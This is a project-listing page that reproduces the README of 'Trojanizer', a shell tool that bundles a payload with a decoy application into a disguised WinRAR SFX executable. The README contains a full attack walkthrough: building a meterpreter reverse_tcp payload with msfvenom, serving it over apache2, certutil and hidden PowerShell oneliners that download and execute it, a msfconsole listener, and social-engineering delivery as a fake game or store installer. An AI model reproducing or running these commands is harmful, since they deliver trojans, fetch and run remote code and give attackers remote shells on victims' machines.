All Projects → r00t-3xp10it → Trojanizer

r00t-3xp10it / Trojanizer

Trojanize your payload - WinRAR (SFX) automatization - under Linux distros

Programming Languages

shell
77523 projects

Projects that are alternatives of or similar to Trojanizer

Mars
Asynchronous Block-Level Storage Replication
Stars: ✭ 168 (-33.07%)
Mutual labels:  linux-kernel
Ipftrace2
A packet oriented Linux kernel function call tracer
Stars: ✭ 193 (-23.11%)
Mutual labels:  linux-kernel
Polycube
eBPF/XDP-based software framework for fast network services running in the Linux kernel.
Stars: ✭ 217 (-13.55%)
Mutual labels:  linux-kernel
Linux 0.12
《Linux内核完全剖析》linux0.12源码及实验环境
Stars: ✭ 177 (-29.48%)
Mutual labels:  linux-kernel
Cacule Cpu Scheduler
The CacULE CPU scheduler is based on interactivity score mechanism. The interactivity score is inspired by the ULE scheduler (FreeBSD scheduler).
Stars: ✭ 185 (-26.29%)
Mutual labels:  linux-kernel
Linux Kernel Module Cheat
The perfect emulation setup to study and develop the Linux kernel v5.4.3, kernel modules, QEMU, gem5 and x86_64, ARMv7 and ARMv8 userland and baremetal assembly, ANSI C, C++ and POSIX. GDB step debug and KGDB just work. Powered by Buildroot and crosstool-NG. Highly automated. Thoroughly documented. Automated tests. "Tested" in an Ubuntu 19.10 ho…
Stars: ✭ 2,748 (+994.82%)
Mutual labels:  linux-kernel
Linux Kernel Utilities
👷 Utilities to compile and / or update linux kernels for Debian and derivatives (e.g. Ubuntu, LinuxMint, etc.)
Stars: ✭ 166 (-33.86%)
Mutual labels:  linux-kernel
Xrt
Xilinx Run Time for FPGA
Stars: ✭ 236 (-5.98%)
Mutual labels:  linux-kernel
Kernel Exploit Tech
Linux Kernel exploitation Tutorial.
Stars: ✭ 192 (-23.51%)
Mutual labels:  linux-kernel
Kvm Kernel Example
Examples for: Learning KVM - implement your own kernel
Stars: ✭ 221 (-11.95%)
Mutual labels:  linux-kernel
Linux Samus
Linux 4.16 on Chromebook Pixel 2015
Stars: ✭ 179 (-28.69%)
Mutual labels:  linux-kernel
Linux Uek
Oracle Linux UEK: Unbreakable Enterprise Kernel
Stars: ✭ 185 (-26.29%)
Mutual labels:  linux-kernel
Prototype Kernel
Prototyping kernel development work outside mainline
Stars: ✭ 214 (-14.74%)
Mutual labels:  linux-kernel
Wifi Txpower Unlocker
Stars: ✭ 173 (-31.08%)
Mutual labels:  linux-kernel
Linux Exploit Suggester
Linux privilege escalation auditing tool
Stars: ✭ 3,126 (+1145.42%)
Mutual labels:  linux-kernel
Kvdo
A pair of kernel modules which provide pools of deduplicated and/or compressed block storage.
Stars: ✭ 168 (-33.07%)
Mutual labels:  linux-kernel
Lttng Tools
The lttng-tools project provides a session daemon (lttng-sessiond) that acts as a tracing registry, the "lttng" command line for tracing control, a lttng-ctl library for tracing control and a lttng-relayd for network streaming.
Stars: ✭ 202 (-19.52%)
Mutual labels:  linux-kernel
Kernel exploit world
Tutorial for writing kernel exploits
Stars: ✭ 248 (-1.2%)
Mutual labels:  linux-kernel
Zenpower
Zenpower is Linux kernel driver for reading temperature, voltage(SVI2), current(SVI2) and power(SVI2) for AMD Zen family CPUs.
Stars: ✭ 237 (-5.58%)
Mutual labels:  linux-kernel
Synwall
A zero-configuration (IoT) firewall
Stars: ✭ 219 (-12.75%)
Mutual labels:  linux-kernel

Version Stage Build AUR

TROJANIZER

Version release : v1.1 (Stable)
Author : pedro ubuntu  [ r00t-3xp10it ]
Codename: Troia_Revisited
Distros Supported : Ubuntu, Kali, Mint, Parrot OS
Suspicious-Shell-Activity (SSA) RedTeam develop @2017

Trojanizer v1.1-Stable


FRAMEWORK DESCRIPTION

The Trojanizer tool uses WinRAR (SFX) to compress the two files input by user,
and transforms it into an SFX executable(.exe) archive. The sfx archive when
executed it will run both files (our payload and the legit appl at the same time).

To make the archive less suspicious to target at execution time, trojanizer will
try to replace the default icon(.ico) of the sfx file with a user-selected one,
and supress all SFX archive sandbox msgs (Silent=1 | Overwrite=1).

'Trojanizer will not build trojans, but from target perspective, it replicates the trojan behavior'
(execute the payload in background, while the legit application executes in foreground).

Trojanizer v1.1-Stable




DEPENDENCIES (backend applications)

Zenity (bash-GUIs) | Wine (x86|x64) | WinRAr.exe (installed-in-wine)
"Trojanizer.sh will download/install all dependencies as they are needed"
╔────────────────────────────────────────────────────────────────────────────────────────────╗
|        It is recomended to edit and config the option: SYSTEM_ARCH=[ your_sys_arch ]       |
|        in the 'settings' file before attempting to run the tool for the first time.        |
╚────────────────────────────────────────────────────────────────────────────────────────────╝

Trojanizer v1.1-Stable


PAYLOADS (agents) ACCEPTED

.exe | .bat | .vbs | .ps1
"All payloads that windows/SFX can auto-extract-execute"

HINT: If sellected 'SINGLE_EXEC=ON' in the settings file,
then trojanizer will accept any kind of extension to be inputed.

LEGIT APPLICATIONS ACCEPTED (decoys)

.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc ..
"All applications that windows/SFX can auto-extract-execute"




ADVANCED SETTINGS

╔─────────────────────────────────────────────────────────────────────────────────────────╗
|         Trojanizer 'advanced options' are only accessible in the 'settings' file,       |
|       and they can only be configurated before running the main tool (Trojanizer.sh)    |
╚─────────────────────────────────────────────────────────────────────────────────────────╝

-- Presetup advanced option
Trojanizer can be configurated to execute a program + command before the extraction/execution of the two compressed files (SFX archive). This allow users to take advantage of pre-installed software to execute a remote command before the actual extraction occurs in target system. If active, trojanizer will asks (zenity sandbox) for the command to be executed Trojanizer v1.1-Stable

-- single_file_execution
Lets look at the follow scenario: You have a dll payload to input that you need to execute upon extraction, but sfx archives can not execute directly dll files, This setting allow users to input one batch script(.bat) that its going to be used to execute the dll payload. All that Trojanizer needs to Do its to instruct the SFX archive to extract both files and them execute the script.bat Trojanizer v1.1-Stable

╔────────────────────────────────────────────────────────────────────────────────────────────────╗
|  single_file_execution switch default behavior its to compress the two files inputed by user   |
|  but only execute one of them at extraction time (the 2º file inputed will be executed) ..     |
╚────────────────────────────────────────────────────────────────────────────────────────────────╝



TROJANIZER AND APPL WHITELISTING BYPASSES

╔────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╗
|   A lot of awesome work has been done by a lot of people, especially @subTee, regarding  application whitelisting  |
|   bypass, which is eventually what we want here: execute arbitrary code abusing Microsoft built-in binaries.       |
| https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ |
╚────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╝

The follow exercise describes how to use trojanizer 'single_file_execution' and 'Presetup' advanced switchs to
drop (remote download) and execute any payload using 'certutil' or 'powershell' appl_whitelisting_bypass oneliners ..


1º - use metasploit to build our payload
     msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe

2º - copy payload.exe to apache2 webroot and start service
     cp payload.exe /var/www/html/payload.exe
     service apache2 start

3º - edit Trojanizer 'settings' file and activate:
     PRE_SETUP=ON
     SINGLE_EXEC=ON

4º - running trojanizer tool
     PAYLOAD TO BE COMPRESSED => <path-to>/screenshot.png (it will not matter what you compress)
     EXECUTE THIS FILE UPON EXTRACTION => <path-to>/AngryBirds.exe (to be executed as decoy application)
     PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f http://192.168.1.69/payload.exe %TEMP%\\payload.exe && start %TEMP%\\payload.exe
     SFX FILENAME => AngryBirds_installer (the name of the sfx archive to be created)
     REPLACE ICON => Windows-Store.ico OR Steam-logo.ico

5º - start a listenner, and send the sfx archive to target using social enginnering
     msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'


╔────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╗
|      When the sfx archive its executed, it will download payload.exe from our apache2 webserver to target and      |
|    execute it before extract 'screenshot.png' and 'AngryBirds.exe' (last one will be executed to serve as decoy)   |
╚────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╝


The follow oneliner uses 'powershell(Downloadfile+start)' method to achieve the same as previous 'certutil' exercise ..
cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe') & start '%TEMP%\\payload.exe'

The follow oneliner uses 'powershell(IEX+downloadstring)' method to achieve allmost the same (payload.ps1 does not touch disk)
cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"




DOWNLOAD/INSTALL

1º - Download framework from github
     git clone https://github.com/r00t-3xp10it/trojanizer.git

2º - Set files execution permitions
     cd trojanizer
     sudo chmod +x *.sh

3º - config framework
     nano settings

4º - Run main tool
     sudo ./Trojanizer.sh




Framework Screenshots

xsf.conf - execute both files upon extraction (trojan behavior) Trojanizer v1.1-Stable
xsf.conf - single_file_execution + Presetup (advanced options) Trojanizer v1.1-Stable
xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (certutil) Trojanizer v1.1-Stable
xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (powershell IEX) Trojanizer v1.1-Stable
Final sfx archive with icon changed
Trojanizer v1.1-Stable
Inside the sfx archive (open with winrar) - trojan behavior
Trojanizer v1.1-Stable
Inside the sfx archive (open with winrar) - single_file_execution
Trojanizer v1.1-Stable




Video tutorials

Trojanizer - AVG anti-virus fake installer (trojan behavior)
https://www.youtube.com/watch?v=BIn6_ccZrI0

Trojanizer - single_file_execution (not trojan behavior)
https://www.youtube.com/watch?v=Ze0JkVtKbns



Special thanks:

@subTee | @enigma0x3 | @H4d3s (SSA)

Referencies:
http://acritum.com/software/manuals/winrar/
https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-msbuild-exe/
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/

Report bugs:

https://github.com/r00t-3xp10it/trojanizer/issues

-- Suspicious-Shell-Activity© (SSA) RedTeam develop @2017 --

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].